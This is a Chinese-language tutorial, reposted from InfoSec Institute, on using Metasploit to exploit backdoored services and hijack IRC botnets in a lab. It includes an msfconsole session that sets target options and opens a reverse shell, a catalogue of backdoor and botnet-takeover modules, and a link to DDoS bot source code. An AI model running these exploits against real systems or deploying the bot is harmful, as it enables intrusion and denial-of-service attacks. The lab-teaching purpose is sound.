metasploit framework中有很多漏洞利用模块,包括缓冲区溢出,浏览器漏洞利用,web应用程序漏洞,后门利用,僵尸接管工具等。exploit开发者以及对这个框架有贡献的人已经分享了很多有趣并且有用的东西。
这篇文章中,我们将讨论利用metasploit来攻击并接管常见的后门和僵尸网络的话题。我们不会深入研究所有的模块,但是会提到一些在未来渗透测试或者工作时会用到的模块。我们不会开发exploit,所以不需要你使用调试器和代码编辑器。
如果你刚开始利用msfconsole(框架的一个命令行接口)来使用metasploit framework,不必担心,这里会一步一步地教你怎么使用漏洞利用模块。这个教程只需要你做一件事,在你的攻击机上安装metasploit,我建议你使用kali linux或者backbox,这是渗透测试的发行版系统,已经预先安装了metasploit。
对于我们的目标机,我建议你把metasploitable 2安装到喜欢的虚拟化平台上,比如vmware或者virtualbox。metasploitable 2是一个有漏洞的ubuntun linux虚拟机,你可以用它练习你的metasploit使用技巧,因为它上面安装了一些不安全的程序。
metasploitable 2虚拟机配置安装了包含有后门和公开漏洞的服务。
在6667端口上,metasploitable 2上运行着有后门的unreaircd irc后台程序,可以通过发送字母“ab”触发,攻击者能够以运行ircd的用户权限执行任意系统命令。这是一个非常好的用来练习的漏洞,我们试试看能不能弹出一个shell。很幸运,metasploit已经有一个该漏洞的利用模块,位于exploit/unix/irc/unreal_ircd_3281_backdoor下面。
输入msfconsole打开metasploit的命令行接口。输入info exploit/unix/irc/unreal_ircd_3281_backdoor可以看到模块的描述信息:“这个模块利用漏洞攻击一个附加有恶意后门的unreal ircd 3.2.8.1下载包。该后门位于2009年11月到2010年6月12日期间的unreal3.2.8.1.tar.gz压缩包中”
现在,是时候攻击这个包含有后门的服务了!
哇哦,我们拿到了shell。想要获取更多关于其它有后门的服务的信息,请查看 metasploitable 2 exploitability guide。
我们讨论的不应该是常见的后门和僵尸网络接管话题吗?是的!我们才刚刚开始,刚才做了一个简单而又简短的介绍,如何利用msf控制台来攻击unreaircd irc服务中的后门。
我们的目标是介绍一个新奇的玩意儿,metasploit已经有了这一类模块,这些模块并不是在web应用程序上远程执行任意代码,也不是在应用程序或服务上进行缓冲区溢出攻击。
在下一个例子中,我们将会使用一个我写的simple backdoor shell remote code execution模块攻击一个web后门。这个模块攻击一个简单的web后门,利用常见后门shell的有脆弱点的参数执行命令。
daniel miessler和jason haddix的owasp安全列表工程里有很多这类后门shell的样本,它们被分类编入到payloads下面。
在我们探究simple backdoor shell remote code execution模块之前,我们首先要在目标机器上创建一个后门shell。我建议你在linux虚拟机上安装一个apache服务器,并编写以下有漏洞的代码:
我把这个代码放在ubuntun vm虚拟机的/var/www/html/msfdev/vulnerable.php路径下,这样我可以使用浏览器访问 http://localhost/msfdev/vulnerable.php ,如下图所示,利用这个漏洞代码的poc就可以通过exec参数执行任意命令。
现在,我们使用simple backdoor shell remote code execution模块。
正如你看到的执行show option命令之后的输出信息,有一些必须的设置的选项(除rhost,rport,以及其它普通选项外),通过设置method指定http方法,通过设置targeturi指定后门shell的路径,以及通过设置var指定参数或者说命令变量。
假设我们的目标机的ip地址是192.168.150.136,我们需要把rhost设置成这个地址,通过设置targeturi为/msfdev/vulnerable.php来定义我们的后门shell的位置。然后是var选项,我们可以设置为exec,这样就可以执行任意命令。我们不需要设置http方法,因为web应用程序允许get方法,并且通过get方法就可以进行漏洞利用。
msf exploit(simple_backdoors_exec) > set rhost 192.168.150.136rhost => 192.168.150.136msf exploit(simple_backdoors_exec) > set var execvar => execmsf exploit(simple_backdoors_exec) > set targeturi /msfdev/vulnerable.phptageturi => /msfdev/vulnerable.phpmsf exploit(simple_backdoors_exec) >exploit[*] started reverse double handler[*] accepted the first client connection…[*] accepted the second client connection…[*] command: echo we5lyqtbehiwwfd4;[*] writing to socket a[*] writing to socket b[*] reading from sockets…[*] reading from socket a[*] a: “we5lyqtbehiwwfd4\r\n”[*] matching…[*] b is input…[*] command shell session 1 opened (192.168.150.129:4444 -> 192.168.150.136:49484) at 2016-02-22 09:24:57 -0500
成功弹出了第二个shell!好了,这就是利用这个模块攻击web shell的全过程。
以下是一些与这类模块相关的其它漏洞利用模块:
th3 mma mma.php backdoor arbitrary file upload – 这个模块攻击th3 mma mma.php后门,可以上传任意文件,这导致任意代码执行。因为php_uname()函数,这个后门也回显了linux内核版本号或者操作系统版本号。
zemra botnet cnc web panel remote code execution – 这个模块攻击cnc web panel of zemra僵尸网络,在其泄漏的源码中包含了一个后门。zemra是一个可以实施ddos攻击的恶意软件,被symantec发现并命名为backdoor.zemra。
china chopper caidao php backdoor code execution – 这个模块攻击一个中国黑客广泛使用的中国菜刀webshell。
horde 3.3.12 backdoor arbitrary php code execution – 这个模块攻击一个包含有任意php代码执行漏洞后门的horde 3.3.12 and horde groupware 1.2.10。
openx backdoor php code execution – 至少在2012年11月到2013年8月期间,penx ad server version 2.8.10上搭载了一个隐藏的后门。漏洞利用非常简单,只需要发送一个含有rot13’d和回连载荷的单独请求。
stunshell web shell remote php code execution – 这个模块攻击一个“stunshell”webshell的未证实版本。当web服务器上开启了安全模式时这个模块有效。该shell被广泛用在自动化rfi载荷中。
继续,列表会越来越长。通过命令search backdoor你可以获取更多的模块。
我编写和贡献的另一类模块是针对僵尸网络接管的。一个好例子是w3tw0rk / pitbul irc bot remote code execution。这个模块攻击一个w3tw0rk僵尸网络,把你的昵称注册或者伪装成注册僵尸网络的irc频道的管理员或者看守人。
我想把这个作为一个挑战给你,因此我不会解释这些选项的含义以及如何攻击这类僵尸网络,而且已经有了一个这个漏洞利用的截屏。我想你已经通过前面的指令看到了设置metasploit的模式。
这里是w3tw0rk / pitbul irc的源代码脚本,它可以用来发动ddos(分布式拒绝服务)或者dos(拒绝服务)攻击:
https://github.com/shipcod3/irc-bot-hunters/blob/master/malicious_samples/w3tw0rk.txt 。你应该在你的虚拟机中运行它,确保它连上你自己的irc服务器,这样你的虚拟机就不会被其它的僵尸网络看守者或恶意软件十字军所控制。
我编写的大多数僵尸网络漏洞利用模块的灵感来源于php irc bot pbot eval() remote code execution模块,这是metasploit中的第一个irc僵尸网络exploit。根据其描述,“这个模块可以在php irc bot pbot上远程命令执行,因为在实现.php命令时对eval()函数的滥用。该模块在jay turla分析的pbot版本上测试成功,发布在infosec institue,运行于ubuntu 10.04和windows xp sp3。”
我不对这个脚本造成的危害负责,但是请仅作为教学目的使用。
其它与僵尸网络接管相关的漏洞利用模块:
xdh / linuxnet perlbot / fbot irc bot remote code execution – 这个模块可以在xdh开发的irc bot上远程命令执行。这个perl bot是conor patrick用他的shellshock蜜罐服务器捕获的,markus zanke将其划入到fbot (fire & forget – ddos bot)类别中。matt thayer发现这个脚本有一个linuxnet perlbot的描述。这个bot只应答配置在perl脚本中的服务名和昵称,因此,为了攻击这个bot你需要能够操作irc网络来欺骗它或者至少有和配置中相同的ip。
ra1nx php bot pubcall authentication bypass remote code execution – 这个模块可以在php irc bot ra1nx 上远程命令执行,通过使用私人信息中的public call特性来秘密绕过认证系统。
legend perl irc bot remote code execution – 这个模块可以在legend perl irc bot上远程命令执行。2014年10月该bot被作为一个载荷用在shellshock spam中。这个特殊的bot有一些功能,比如nmap扫描, tcp, http, sql, and udp洪泛攻击,清除系统日志,获取root权限,vnc扫描。damballa的高级威胁研究专家kevin stevens把这个脚本上传到virustotal上,其md5为11a9f1589472efa719827079c3d13f76。
dexter (casinoloader) sql injection – 这个模块攻击一个在control dexter上使用的命令和控制面板中发现的漏洞。漏洞利用通过访问一个bots使用的php页面(gateway.php)实现,这个页面并没有对输入作防护。输入被加密和编码。命令和控制面板指定了一个上传文件的位置,这可以作为写入php shell的可靠位置。攻击这个漏洞并不需要认证。
参考文献: https://community.rapid7.com/docs/doc-1875
https://forums.unrealircd.org/viewtopic.php?t=6562
https://github.com/rapid7/metasploit-framework/
*原文 : infosecinstitute felix编译,转载请注明来自freebuf黑客与极客(freebuf.com)